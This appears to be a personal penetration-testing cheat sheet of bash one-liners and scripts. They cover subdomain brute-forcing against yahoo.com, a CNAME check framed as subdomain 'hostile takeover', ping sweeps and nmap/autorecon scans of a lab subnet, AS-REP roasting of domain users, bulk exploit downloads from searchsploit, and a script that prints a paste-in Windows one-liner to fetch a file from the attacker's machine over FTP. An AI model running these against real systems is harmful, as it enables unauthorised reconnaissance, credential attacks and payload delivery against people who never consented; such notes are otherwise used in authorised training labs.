Bash Voodoo
#Figure out whether the last command worked or not
echo $? #Find out whether a given domain resolves
if host target.com; then echo “It Resolves”; fi#enumerate subdomains
while read sub; do echo "$sub.sbtuk.net"; done < subdomains.txt
#touch a subdomains.txtseparetely, file contains:
admin
test
qa
dev
www
m
blog#Bruteforce subdomains | chmod 777 and run
#!/bin/bash
while read sub; do
if host $sub.yahoo.com; then
echo "$sub.yahoo.com"
fi
done < subdomains.txt
#Resolving CNAMES script | cnames.sh
##Use the subdomains.txt list above to enumerate for hostile takeover##
#!/bin/bash
domain=$1
while read sub; do
cname=$(host -t CNAME $sub.$domain | grep 'an alias' | awk '{print $NF}')
if [ -z "$cname" ]; then
continue
fi
if ! host $cname &> /dev/null; then
echo "$cname did not resolve ($sub.$domain)";
fi
done
#Concatenate the scripts to bruteforce yahoo.com
cat subdomains.txt | ./cnames.sh yahoo.com #export IP variable
export IP=192.168.101.57
nmap -sC -sV -oA quick $IP#Repeat the last command
!1
OR
!!#Reverse-i search
press ctrl + r , then type dpkg (to look for dpkg in history)#History tricks
export HISTCONTROL=ignoredups #ignores duplicate commands
export HISTIGNORE="&:ls:[bf]g:exit:history" #ignores common commands#Assign a command to a variable
user=$(whoami)
echo $user#URL generator script
#!/bin/bash
for i in {tokyo,beijing,newyork,rome,bangkok,osaka}; do
for j in {0..9}; do
for k in {0..9}; do
echo "http://example/com/$i/$j/$k" >> password.txt
done
done
done#ping sweep script
#!/bin/bash
#if you do a ping-sweep with host the command will take about a second to complete.
#And if you run that against 255 hosts I will take a long time to complete. To avoid this we can just deamonize every execution to make it faster.
#We #use the & to daemonize it.
#!/bin/bash
for ip in $(cat ips.txt); do
ping -c 1 $ip &
done#Print out all IPs in a given subnet
for ip in $(seq 1 10); do echo 10.11.1.$ip; done
#Variation with braces instead of seq to specify a range
for i in {0..255}; do echo 10.11.1.$i;done
#Same output but using a while loop instead
-lt flag stands for “less than”
(will print out 1 - 9 and exclude 10)
#!/bin/bash
# while loop example
counter=1
while [ $counter -lt 10 ]
do
echo "10.11.1.$counter"
((counter++))
done
#Create a list of hosts and redirect output to a list.txt
#This command will print out all possible addresses in Lab subnet
for i in {0..254}; do echo 10.11.1.$i;done
#Redirecting output to a file
for i in {1..10}; do echo 10.11.1.$i >> list.txt;done
#wget a given target and use grep/bash to filter for subdomains
sudo wget www.megacorpone.com
#use grep “href=” to extract all the lines in index.html that contain HTML links
grep "href=" index.html
#beautify the output
grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}'
#using cut to only leave subdomains
grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}' | cut -d "/" -f 1
#grep -o returns the string defined in the regular expression
grep -o '[^/]*\.megacorpone\.com' index.html | sort -u > list.txt
‘[^/]*\.megacorpone\.com’ this is the string we are looking for
#DNS recon scripts
for i in {0..255}; do echo 10.11.1.$i >> list.txt;done
Then:
for url in $(cat list.txt); do host $url; done
#Parse through output grepping for available addresses
for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u
#Using curl
#Similar to wget technique but with curl
curl -s https://www.cisco.com | grep 'href=' | cut -d'/' -f3 | grep 'cisco.com' | cut -d'"' -f1 | sort -u > test
#Beautify output
curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u
#Parsing with grep
for url in $(curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u); do host $url | grep 'has address' | cut -d' ' -f4; done
#Running Autorecon against an entire subnet
#Use nmap sweep to check all ports
nmap -A --open 10.11.1.0/24 -oG Available_nmap-scan_10.11.1.1-254
cat Available_nmap-scan_10.11.1.1-254 | grep -v "Nmap" | awk '{print $2}' | sort -u
#Redirect output to another file --> targets.txt
cat Available_nmap-scan_10.11.1.1-254 | grep -v "Nmap" | awk '{print $2}' | sort -u > targets.txt
autorecon targets.txt
#Workaround to use nmapAutomator against a subnet
for ip in $(cat targets.txt); do bash /usr/local/bin/nmapAutomator.sh --host $ip --type Full -o scan.txt & done#Reverse lookup script
#!/bin/bash
i="1"
echo "Please enter first 3 octets. e.g 192.168.1"
read subnet
while [ $i -le 254 ]; do
host -l "$subnet"."$i"
i=$(( $i + 1))
done#check ASREPRoast for all domain users (without credentials)
for user in $(cat users.txt); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 domain/${user} | grep -v Impacket; done#Bash customization | edit /etc/bash.bashrc with root privileges
nano /etc/bash.bashrc
alias gobustLin = sudo gobuster dir -e u --url http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,bak,html,txt,zip
#Search for a given exploit and download all matches
#!/bin/bash
#replace redcliff debian with keywords to search for
for e in $(searchsploit redcliff debian -w -t | grep http | cut -f 2 -d "|")
do
exp_name=$(echo $e | cut -d "/" -f 5) url=$(echo $e | sed 's/exploits/raw/')
wget -q --no-check-certificate $url -O $exp_name
done#FTP script to spawn a one-liner for downloading
#!/bin/bash
#Outputs a one liner to paste into a Windows host to create and run a ftp script to download a given file.
# Text coloring
yellow='\033[1;33m'
red='\033[1;91m'
nc='\033[0m'
echo
echo -e "${yellow}This gives you a one liner to paste into a Windows host to create and run a ftp script."
echo
# change tun0 to your interface if needed
ip=$(ifconfig tun0 | grep inet | cut -d" " -f10 | head -1)
echo -e "Using IP address of tun0: $ip"
echo
echo -e "What port do you want the ftp server to run on? Hit enter for default of 21${nc}"
read port
if [[ -z "$port" ]];
then
ftpport="21"
else
ftpport="$port"
fi
echo
echo -e "${yellow}Enter the username: ${nc}"
read user
echo
echo -e "${yellow}Enter the password: ${nc}"
read pass
echo
echo -e "${yellow}What file do you want the remote host to download?${nc}"
read file
echo
echo -e "${yellow}Paste the below to create a ftp script and run it:${nc}"
echo
echo "echo open $ip $ftpport>ftp.txt&&echo $user>>ftp.txt&&echo $pass>>ftp.txt&&echo bin>>ftp.txt&&echo get $file>>ftp.txt&&echo bye>>ftp.txt&&ftp -s:ftp.txt"
echo
Last updated